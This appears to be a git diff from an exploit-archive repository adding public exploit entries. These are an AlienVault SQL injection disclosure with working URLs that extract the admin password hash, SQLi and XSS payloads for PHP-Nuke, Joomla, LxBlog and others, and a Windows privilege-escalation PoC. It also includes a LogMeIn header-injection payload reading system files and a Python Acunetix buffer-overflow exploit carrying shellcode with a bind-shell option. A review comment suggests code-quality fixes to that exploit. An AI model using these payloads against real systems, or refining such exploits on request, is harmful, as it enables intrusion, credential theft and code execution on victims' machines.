Vendor provides a quick fix and a release schedule. +2014-04-21: Vendor releases a fixed version +2014-04-23: SEC Consult releases a coordinated security advisory. + + +Solution: +--------- +Update to the most recent version (10.2.9) of Arkeia Network Backup. 
+ +More information can be found at: +http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution + + +Workaround: +----------- + + +Advisory URL: +------------- +https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm + + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +SEC Consult Vulnerability Lab + +SEC Consult +Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius + +Headquarter: +Mooslackengasse 17, 1190 Vienna, Austria +Phone: +43 1 8903043 0 +Fax: +43 1 8903043 15 + +Mail: research at sec-consult dot com +Web: https://www.sec-consult.com +Blog: http://blog.sec-consult.com +Twitter: https://twitter.com/sec_consult + +Interested to work with the experts of SEC Consult? +Write to career@sec-consult.com + +EOF M. Lucinskij / @2014 \ No newline at end of file diff --git a/platforms/php/webapps/33006.txt b/platforms/php/webapps/33006.txt new file mode 100755 index 000000000..732b85aa7 --- /dev/null +++ b/platforms/php/webapps/33006.txt 
@@ -0,0 +1,73 @@
+AlienVault 4.3.1 Unauthenticated SQL Injection
+Vulnerability Type: SQL Injection
+Reporter: Sasha Zivojinovic
+Company: Gotham Digital Science
+Affected Software: AlienVault 4.3.1
+
+Severity: Critical
+
+===========================================================
+Summary
+===========================================================
+
+A number of SQL injection vectors were identified within AlienVault (AV) 4.3.1 components. The “Geolocation Graph” and “Radar Access Control” AV components were found to accept HTTP request parameters that are concatenated without filtering or validation. These parameters are then passed as SQL queries which exposes the application to SQL Injection. This issue can be exploited by any unauthenticated users who have access to the AV web application. In addition the effective MySQL user was found to be “root” which allows attackers to leverage the identified issues into attacks against the AV host system.
+
+===========================================================
+Technical Details
+===========================================================
+
+The ‘date_from’ and ‘date_to’ parameters passed to the ‘graph_geoloc.php’ page, the ‘date_from’ and ‘date_to’ parameters passed to the ‘radar-iso27001-A11AccessControl-pot.php’ page and the “user” parameter passed to the “graph_geoloc2.php” page are vulnerable to SQL injection attacks. These parameters were found to evaluate any SQL statements passed to them via a HTTP GET request.
+
+PHP functions “whereYM” and “getSourceLocalSSIYear” in source file “/var/www/geoloc/include/data_functions.inc” do not filter or validate user supplied input when constructing dynamic SQL queries. Attackers can inject arbitrary SQL statements that will be evaluated on the underlying MySQL server.
+
+Due to time limitations it has not been possible to locate the causes of the other identified vectors.
+ + +Extending the attack: + +An attacker can retrieve various AV credentials including the MySQL connection string by querying the “alienvault.config” database table or by querying the “/etc/ossim/idm/config.xml” file through MySQL file access methods such as “LOAD_FILE”. Almost all credentials used by AV are equivalent so retrieving the credentials for the nessus user will also reveal the credentials for the SQL server and other components. These credentials are stored in plain-text within the database. By querying the “alienvault.users” table the attacker can retrieve the unsalted MD5 password hashes for administrative users. These hashed credentials are equivalent to the SSH credentials for the same users. Once these credentials have been retrieved and cracked an attacker can bypass the restrictions present in the SQL injection vector and perform arbitrary system or SQL queries by connecting directly to the AV host via SSH and using the local MySQL client to connect to the MySQL server. + + +Cross Site Scripting (XSS): + +In addition the presence of MySQL errors presents an opportunity for reflected XSS attacks as the MySQL server does not filter responses when returning errors to the application user. + + +=========================================================== +Proof-of-Concept Exploit +=========================================================== + +https://127.0.0.1/geoloc/graph_geoloc.php?date_from=2013-07-01’%20union%20all%20select(SLEEP(10)),2—%20-&date_to=2013-07-30 +The integer value passed as a parameter to the “SLEEP” function can be increased or decreased to validate this finding. 
+ +Error based evaluation can be used to return the MySQL version as per the following examples: + +https://127.0.0.1/geoloc/graph_geoloc2.php?year=2007&user=dsdds’%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,(1)and(select+1+from(select+count(*),concat((select+@@version),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a);—%20- +https://127.0.0.1/geoloc/graph_geoloc.php?date_from=2013-07-01’%20union%20all%20select+(1)and(select+1+from(select+count(*),concat((select+@@version),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2—%20-&date_to=2013-07-30 +https://127.0.0.1/geoloc/graph_geoloc.php?date_from=2013-07-01&date_to=2013-07-30’%20union%20all%20select+(1)and(select+1+from(select+count(*),concat((select+@@version),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2—%20- +https://127.0.0.1/RadarReport/radar-iso27001-A11AccessControl-pot.php?date_from=2&date_to=2’%20union%20all%20select+(1)and(select+1+from(select+count(*),concat((select+@@version),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2—%20- +https://127.0.0.1/RadarReport/radar-iso27001-A11AccessControl-pot.php?date_from=2’%20union%20all%20select+(1)and(select+1+from(select+count(*),concat((select+@@version),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2—%20-&date_to=2 +https://127.0.0.1/RadarReport/radar-iso27001-A11AccessControl-pot.php?date_from=2’%20union%20all%20select+(1)and(select+1+from(select+count(*),concat((concat(0x3c7363726970743e616c6572742822,’database%20version:’,@@version,0x22293c2f7363726970743e)),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2—%20-&date_to=2 +Response: + +Duplicate entry ‘5.5.29-29.41’ for key ‘group_key’ +Pulling “admin” user password hashes: + +https://127.0.0.1/RadarReport/radar-iso27001-A11AccessControl-pot.php?date_from=2’%20union%20all%20select+(1)and(select+1+from(select+count(*),concat((select pass from alienvault.users where 
login=’admin’),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),2—%20-&date_to=2
+
+Cross Site Scripting:
+
+The following examples demonstrate the use of unfiltered MySQL errors as an XSS vector:
+
+Vanilla XSS
+
+https://127.0.0.1/geoloc/graph_geoloc.php?date_from=2013-07-01’%20union%20select%200”,2%20—%20-&date_to=2013-07-30
+ASCII Encoded XSS Variant (useful in bypassing application layer filters)
+
+https://127.0.0.1/geoloc/graph_geoloc.php?date_from=2013-07-01’%20union%20select%200x27223e3c7363726970743e616c6572742831293c2f7363726970743e,2%20—%20-&date_to=2013-07-30
+
+===========================================================
+Recommendation
+===========================================================
+
+AlienVault deployments should be upgraded to the latest stable version. The issues documented in this disclosure have been remediated in AlienVault 4.3.2.
\ No newline at end of file
diff --git a/platforms/php/webapps/33008.txt b/platforms/php/webapps/33008.txt
new file mode 100755
index 000000000..ea95002fb
--- /dev/null
+++ b/platforms/php/webapps/33008.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/35071/info
+
+LxBlog is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The following example URIs are available:
+
+http://www.example.com/user_index.php?action=tag&job=modify&type=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid =1 AND
+if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*&item_type[]=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid =1 AND
+if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*
+
+http://www.example.com/user_index.php?action=tag&job=modify&type=[XSS]&item_type[]=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/33011.txt b/platforms/php/webapps/33011.txt
new file mode 100755
index 000000000..4bf80c54e
--- /dev/null
+++ b/platforms/php/webapps/33011.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/35117/info
+
+PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHP-Nuke 8.0.0 is vulnerable; other versions may also be affected.
+
+The following sample request is available:
+
+GET http://www.example.com/PHP-Nuke-8.0/index.php HTTP/1.0
+Accept: */*
+referer: '+IF(False,'',SLEEP(5))+'
\ No newline at end of file
diff --git a/platforms/php/webapps/33013.txt b/platforms/php/webapps/33013.txt
new file mode 100755
index 000000000..ea15e4391
--- /dev/null
+++ b/platforms/php/webapps/33013.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/35124/info
+
+Vanilla is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to Vanilla 1.1.8 are vulnerable.
+
+http://www.example.com/ajax/updatecheck.php?PostBackKey=1&ExtensionKey=1&RequestName=1
\ No newline at end of file
diff --git a/platforms/php/webapps/33014.txt b/platforms/php/webapps/33014.txt
new file mode 100755
index 000000000..2b28b3566
--- /dev/null
+++ b/platforms/php/webapps/33014.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/35140/info
+
+Achievo is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Achievo 1.3.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/achievo/index.php?">
+http://www.example.com/achievo/dispatch.php?atknodetype=pim.pim&atkaction=
+
diff --git a/platforms/php/webapps/33021.txt b/platforms/php/webapps/33021.txt
new file mode 100755
index 000000000..7dd5b9b1e
--- /dev/null
+++ b/platforms/php/webapps/33021.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/35180/info
+
+PHP-Nuke is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+PHP-Nuke 8.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/modules.php?name=Downloads&d_op=search&query='';!--"[script]alert(document.cookie)[/script]
\ No newline at end of file
diff --git a/platforms/php/webapps/33022.txt b/platforms/php/webapps/33022.txt
new file mode 100755
index 000000000..fbfdbd530
--- /dev/null
+++ b/platforms/php/webapps/33022.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/35189/info
+
+
+Joomla! is prone to multiple cross-site scripting and HTML-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues affect the 'com_user' component, the 'JA_Purity' template, and the administrative panel in the 'Site client' subproject of the application.
+
+An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
+
+Versions prior to Joomla!1.5.11 are vulnerable.
+
+http://www.example.com/path/?theme_header=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
+http://www.example.com/path/?theme_background=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
+http://www.example.com/path/?theme_elements=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
+http://www.example.com/path/?logoType=1&logoText=%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
+http://www.example.com/path/?logoType=1&sloganText=%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
+http://www.example.com/path/?excludeModules=%27;alert(8);%20var%20b=%27
+http://www.example.com/path/?rightCollapseDefault=%27;alert(8);%20var%20b=%27
+http://www.example.com/path/?ja_font=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3B%3C%2Fscript%3E
diff --git a/platforms/windows/local/33012.c b/platforms/windows/local/33012.c
new file mode 100755
index 000000000..c561ef8a6
--- /dev/null
+++ b/platforms/windows/local/33012.c
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/35120/info
+
+Microsoft Windows is prone to a local privilege-escalation vulnerability.
+
+Attackers may exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will facilitate the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.
+
+#include
+int main()
+{
+ WCHAR c[1000] = {0};
+ memset(c, ?c?, 1000);
+ SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0);
+
+ WCHAR b[1000] = {0};
+ SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0);
+ return 0;
+}
\ No newline at end of file
diff --git a/platforms/windows/remote/32997.pl b/platforms/windows/remote/32997.pl
index 67d635781..9da984e1e 100755
--- a/platforms/windows/remote/32997.pl
+++ b/platforms/windows/remote/32997.pl
@@ -1,81 +1,150 @@
-# Exploit Title: Acunetix Stack Based overflow
-# Date: 24/04/14
-# Exploit Author: Danor Cohen (An7i) - http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html
-# Vendor Homepage: http://www.acunetix.com/
-# Software Link: http://www.acunetix.com/vulnerability-scanner/download/
-# Version: 8 build 20120704
-# Tested on: XP
+#!/usr/bin/python
+# Title: Acunetix Web Vulnerability Scanner Buffer Overflow Exploit
+# Version: 8
+# Build: 20120704
+# Tested on: Windows XP SP2 en
+# Vendor: http://www.acunetix.com/
+# Original Advisory: http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html
+# Exploit-Author: Osanda Malith
+# Follow @OsandaMalith
+# Exploit write-up: http://osandamalith.wordpress.com/2014/04/24/pwning-script-kiddies-acunetix-buffer-overflow/
+# /!\ Author is not responsible for any damage you cause
+# This POC is for educational purposes only
+# Video: https://www.youtube.com/watch?v=RHaMx8K1GeM
+# CVE: CVE-2014-2994
+'''
+Host the generated file in a server. The victim should select the external host. Otherwise we cannot trigger
+the vulnerability.
+'''
+print ('[~] Acunetix Web Vulnerability Scanner Buffer Overflow Exploit\n')
+while True:
+ try:
+ choice = int(raw_input("[?] Choose your payload:\n1. Calculator\n2. Bind Shell\n"))
+ except ValueError:
+ print "[!] 
Enter only a number" + continue + + if choice == 1: + shellcode = "" + shellcode += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" + shellcode += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" + shellcode += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" + shellcode += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" + shellcode += "\x49\x6c\x6d\x38\x6e\x69\x75\x50\x73\x30\x77\x70\x63" + shellcode += "\x50\x6f\x79\x68\x65\x30\x31\x49\x42\x63\x54\x4c\x4b" + shellcode += "\x31\x42\x46\x50\x4c\x4b\x46\x32\x44\x4c\x6e\x6b\x70" + shellcode += "\x52\x46\x74\x4c\x4b\x64\x32\x34\x68\x64\x4f\x4e\x57" + shellcode += "\x30\x4a\x35\x76\x66\x51\x69\x6f\x64\x71\x69\x50\x6e" + shellcode += "\x4c\x65\x6c\x71\x71\x61\x6c\x77\x72\x74\x6c\x31\x30" + shellcode += "\x69\x51\x4a\x6f\x54\x4d\x53\x31\x69\x57\x39\x72\x58" + shellcode += "\x70\x71\x42\x53\x67\x6e\x6b\x63\x62\x74\x50\x6e\x6b" + shellcode += "\x53\x72\x57\x4c\x77\x71\x48\x50\x6c\x4b\x37\x30\x31" + shellcode += "\x68\x4e\x65\x4b\x70\x43\x44\x31\x5a\x36\x61\x58\x50" + shellcode += "\x62\x70\x6c\x4b\x31\x58\x34\x58\x6e\x6b\x42\x78\x77" + shellcode += "\x50\x36\x61\x38\x53\x6b\x53\x67\x4c\x57\x39\x4e\x6b" + shellcode += "\x77\x44\x4e\x6b\x47\x71\x69\x46\x34\x71\x49\x6f\x64" + shellcode += "\x71\x39\x50\x6c\x6c\x6f\x31\x7a\x6f\x46\x6d\x47\x71" + shellcode += "\x69\x57\x35\x68\x59\x70\x71\x65\x49\x64\x57\x73\x33" + shellcode += "\x4d\x6a\x58\x35\x6b\x43\x4d\x67\x54\x31\x65\x6d\x32" + shellcode += "\x61\x48\x6c\x4b\x51\x48\x34\x64\x66\x61\x6e\x33\x35" + shellcode += "\x36\x6c\x4b\x66\x6c\x30\x4b\x4e\x6b\x43\x68\x45\x4c" + shellcode += "\x33\x31\x4a\x73\x4c\x4b\x53\x34\x4e\x6b\x53\x31\x4e" + shellcode += "\x30\x4c\x49\x37\x34\x54\x64\x54\x64\x73\x6b\x31\x4b" + shellcode += "\x31\x71\x52\x79\x42\x7a\x53\x61\x79\x6f\x69\x70\x42" + shellcode += "\x78\x63\x6f\x43\x6a\x6c\x4b\x77\x62\x7a\x4b\x6c\x46" + shellcode += "\x53\x6d\x70\x6a\x57\x71\x4c\x4d\x4e\x65\x6e\x59\x53" + shellcode += 
"\x30\x45\x50\x47\x70\x52\x70\x52\x48\x44\x71\x6e\x6b" + shellcode += "\x42\x4f\x4b\x37\x6b\x4f\x78\x55\x4d\x6b\x6b\x50\x45" + shellcode += "\x4d\x56\x4a\x47\x7a\x50\x68\x4f\x56\x4e\x75\x6f\x4d" + shellcode += "\x4f\x6d\x59\x6f\x68\x55\x77\x4c\x46\x66\x51\x6c\x65" + shellcode += "\x5a\x6d\x50\x6b\x4b\x4b\x50\x44\x35\x56\x65\x6f\x4b" + shellcode += "\x71\x57\x64\x53\x54\x32\x42\x4f\x53\x5a\x33\x30\x61" + shellcode += "\x43\x49\x6f\x68\x55\x33\x53\x33\x51\x52\x4c\x43\x53" + shellcode += "\x65\x50\x41\x41" + break -#This exploit generates HTML file, if this HTML will be scanned with ACUNETIX, shell will be executed. - -my $file= "index.html"; -my $HTMLHeader1 = "\r\n"; -my $HTMLHeader2 = "\r\n"; -my $IMGheader1 = "\ + \ +

Scan This Site and Get Pwned :)


") +junk = ("\ + $file"); -print $FILE $HTMLHeader1.$FinalDomainName1.$FinalDomainName2.$FinalDomainName3.$FinalDomainName4.$FinalDomainName5.$FinalExploitDomain.$HTMLHeader2; -close($FILE); -print "Acunetix Killer File Created successfully\n"; +shellcode += "\">" +tail = ("\ + \ + ") +exploit = head + junk + edx + junk2 + eip + shellcode + tail +filename = "Exploit.htm" +file = open(filename, "w") +file.write(exploit) +file.close() +print "[~] " + str(len(exploit)) + " Bytes written to file" +#EOF \ No newline at end of file diff --git a/platforms/windows/remote/33025.txt b/platforms/windows/remote/33025.txt new file mode 100755 index 000000000..64a8776ab --- /dev/null +++ b/platforms/windows/remote/33025.txt 
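Review bot: The file keeps its `.pl` path while the new contents are a Python 2 script (`#!/usr/bin/python`, `raw_input`, statement-form `print`), so the filename no longer tells a reader which interpreter it needs; renaming to a `.py` path or stating "Python 2" in the header block would remove the mismatch. In the output section at the end of the hunk, `file = open(filename, "w")` shadows the `file` builtin and leaves the handle open if `write` raises; `with open(filename, "w") as out: out.write(exploit)` releases it on every path. The lines between `break` and `junk = (` appear tag-stripped in this view, so the HTML template portion of the hunk could not be reviewed.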
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/35236/info
+
+LogMeIn is prone to a vulnerability that allows attackers to inject arbitrary HTTP headers because it fails to sufficiently sanitize input.
+
+By inserting arbitrary headers into an HTTP response, attackers may be able to launch various attacks, including cross-site request forgery, cross-site scripting, and HTTP-request smuggling.
+
+LogMeIn 4.0.784 is vulnerable; other versions may also be affected.
+
+The following example URI is available:
+http://securethoughts.com/2009/06/multiple-vulnerabilities-in-logmein-web-interface-can-be-used-to-control-your-computer-and-steal-arbitary-files/#viewSource
+http://www.example.com/cfgadvanced.html?op=update&DisconnectExisting=1&NoHttpCompr=1&CrashDumpInfo=0&lang=en-US%0D%0A%0D%0A%3Chtml%3E%3Cbody%3E%3C/body%3E%3CSCRIPT%3Evar%20ifr%3Dnull%3Bfunction%20al%28%29%7Bvar%20str%3D%28window.frames%5B0%5D.document.body.innerHTML%20%7C%7C%20ifr.contentDocument.documentElement.innerHTML%29%3Balert%28str.substring%28%28str.toLowerCase%28%29%29.indexOf%28%22%3Clegend%3E%22%2C400%29%29%29%3B%7D%20if%28window.location.href.match%28/.*cfgad.*/%29%29%7Bifr%3Ddocument.createElement%28%22iframe%22%29%3Bifr.src%3D%22https%3A//localhost%3A2002/logs.html%3Flog%3D../../../windows/win.ini%22%3Bdocument.body.appendChild%28ifr%29%3BsetTimeout%28%22al%28%29%22%2C4000%29%3B%7D%3C/script%3E%3C%21--
\ No newline at end of file